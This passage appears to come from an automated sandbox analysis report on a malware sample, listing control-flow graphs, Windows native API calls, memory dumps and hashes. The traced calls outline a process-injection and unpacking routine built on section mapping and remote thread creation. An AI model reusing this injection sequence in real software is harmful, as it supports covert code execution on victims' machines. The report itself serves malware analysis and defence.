                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                        • Opcode Fuzzy Hash: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 159 4018c5 153->159 160 4018bc-4018e3 call 401193 153->160 159->160 162->152 164 4015e1-401605 NtCreateSection 162->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 170 40168d-401691 166->170 167->166 169 40162a-401646 NtMapViewOfSection 167->169 169->166 172 401648-40165e 169->172 170->152 173 401697-4016b8 NtMapViewOfSection 170->173 172->166 173->152 175 4016be-4016da NtMapViewOfSection 173->175 175->152 176 4016e0 call 4016e5 175->176
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                        • Opcode Fuzzy Hash: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 203 4018c5 197->203 204 4018bc-4018e3 call 401193 197->204 203->204 206->196 208 4015e1-401605 NtCreateSection 206->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 214 40168d-401691 210->214 211->210 213 40162a-401646 NtMapViewOfSection 211->213 213->210 216 401648-40165e 213->216 214->196 217 401697-4016b8 NtMapViewOfSection 214->217 216->210 217->196 219 4016be-4016da NtMapViewOfSection 217->219 219->196 220 4016e0 call 4016e5 219->220
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                        • Opcode Fuzzy Hash: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 242 4018c5 236->242 243 4018bc-4018e3 call 401193 236->243 242->243 245->235 247 4015e1-401605 NtCreateSection 245->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 253 40168d-401691 249->253 250->249 252 40162a-401646 NtMapViewOfSection 250->252 252->249 255 401648-40165e 252->255 253->235 256 401697-4016b8 NtMapViewOfSection 253->256 255->249 256->235 258 4016be-4016da NtMapViewOfSection 256->258 258->235 259 4016e0 call 4016e5 258->259
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                        • Opcode Fuzzy Hash: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 282 4018c5 276->282 283 4018bc-4018e3 call 401193 276->283 282->283 285->275 287 4015e1-401605 NtCreateSection 285->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 293 40168d-401691 289->293 290->289 292 40162a-401646 NtMapViewOfSection 290->292 292->289 295 401648-40165e 292->295 293->275 296 401697-4016b8 NtMapViewOfSection 293->296 295->289 296->275 298 4016be-4016da NtMapViewOfSection 296->298 298->275 299 4016e0 call 4016e5 298->299
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                        • Opcode Fuzzy Hash: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 252003c-2520047 1 2520049 0->1 2 252004c-2520263 call 2520a3f call 2520e0f call 2520d90 VirtualAlloc 0->2 1->2 17 2520265-2520289 call 2520a69 2->17 18 252028b-2520292 2->18 23 25202ce-25203c2 VirtualProtect call 2520cce call 2520ce7 17->23 20 25202a1-25202b0 18->20 22 25202b2-25202cc 20->22 20->23 22->20 29 25203d1-25203e0 23->29 30 25203e2-2520437 call 2520ce7 29->30 31 2520439-25204b8 VirtualFree 29->31 30->29 33 25205f4-25205fe 31->33 34 25204be-25204cd 31->34 37 2520604-252060d 33->37 38 252077f-2520789 33->38 36 25204d3-25204dd 34->36 36->33 41 25204e3-2520505 36->41 37->38 39 2520613-2520637 37->39 42 25207a6-25207b0 38->42 43 252078b-25207a3 38->43 44 252063e-2520648 39->44 54 2520517-2520520 41->54 55 2520507-2520515 41->55 45 25207b6-25207cb 42->45 46 252086e-25208be LoadLibraryA 42->46 43->42 44->38 48 252064e-252065a 44->48 47 25207d2-25207d5 45->47 53 25208c7-25208f9 46->53 50 25207d7-25207e0 47->50 51 2520824-2520833 47->51 48->38 52 2520660-252066a 48->52 57 25207e2 50->57 58 25207e4-2520822 50->58 60 2520839-252083c 51->60 59 252067a-2520689 52->59 61 2520902-252091d 53->61 62 25208fb-2520901 53->62 56 2520526-2520547 54->56 55->56 63 252054d-2520550 56->63 57->51 58->47 64 2520750-252077a 59->64 65 252068f-25206b2 59->65 60->46 66 252083e-2520847 60->66 62->61 68 25205e0-25205ef 63->68 69 2520556-252056b 63->69 64->44 70 25206b4-25206ed 65->70 71 25206ef-25206fc 65->71 72 252084b-252086c 66->72 73 2520849 66->73 68->36 74 252056f-252057a 69->74 75 252056d 69->75 70->71 76 252074b 71->76 77 25206fe-2520748 71->77 72->60 73->46 78 252059b-25205bb 74->78 79 252057c-2520599 74->79 75->68 76->59 77->76 84 25205bd-25205db 78->84 79->84 84->63
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0252024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_2520000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 1e46428af89d03d9eea345c8977b0cf0df5e278e99040794962eefb35d28ee77
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 10525A75A01229DFDB64CF58C984BA8BBB1BF09314F1480D9E54DAB391DB30AA89CF14

                                                                        Control-flow Graph

                                                                        control_flow_graph 319 26df236-26df24f 320 26df251-26df253 319->320 321 26df25a-26df266 CreateToolhelp32Snapshot 320->321 322 26df255 320->322 323 26df268-26df26e 321->323 324 26df276-26df283 Module32First 321->324 322->321 323->324 329 26df270-26df274 323->329 325 26df28c-26df294 324->325 326 26df285-26df286 call 26deef5 324->326 330 26df28b 326->330 329->320 329->324 330->325
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026DF25E
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 026DF27E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 026CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_26cd000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 78c155dd277cf891eb976f98064f162a9f62f7d55eaf1d6d146468a18cfa4788
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: 19F096359007186FD7203BF9A8CDB6F76E8AF89625F100529E643D59C0DB70E8454AA1

                                                                        Control-flow Graph

                                                                        control_flow_graph 332 2520e0f-2520e24 SetErrorMode * 2 333 2520e26 332->333 334 2520e2b-2520e2c 332->334 333->334
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02520223,?,?), ref: 02520E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02520223,?,?), ref: 02520E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_2520000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: a45cf177f0ecddc54456e47d672fa3adceeee364b8599841ec49e672e1a97264
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: E7D0123114512877D7002A94DC09BCD7F1CDF05B66F008011FB0DD90C0C770954046E9

                                                                        Control-flow Graph

                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                        Control-flow Graph

                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                        Control-flow Graph

                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                        Control-flow Graph

                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                        Control-flow Graph

                                                                        control_flow_graph 444 26deef5-26def2f call 26df208 447 26def7d 444->447 448 26def31-26def64 VirtualAlloc call 26def82 444->448 447->447 450 26def69-26def7b 448->450 450->447
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 026DEF46
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 026CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_26cd000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: e67c518d724e1c1c32ca55d9673fa6b87e01bb27949707c0618f8dc84b153cd6
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 15113979A00208EFDB01DF98C985E99BFF5AF08350F0580A4F9489B361D371EA90EF80

                                                                        Control-flow Graph

                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                        Execution Graph

                                                                        Execution Coverage:6.3%
                                                                        Dynamic/Decrypted Code Coverage:43.3%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:120
                                                                        Total number of Limit Nodes:4
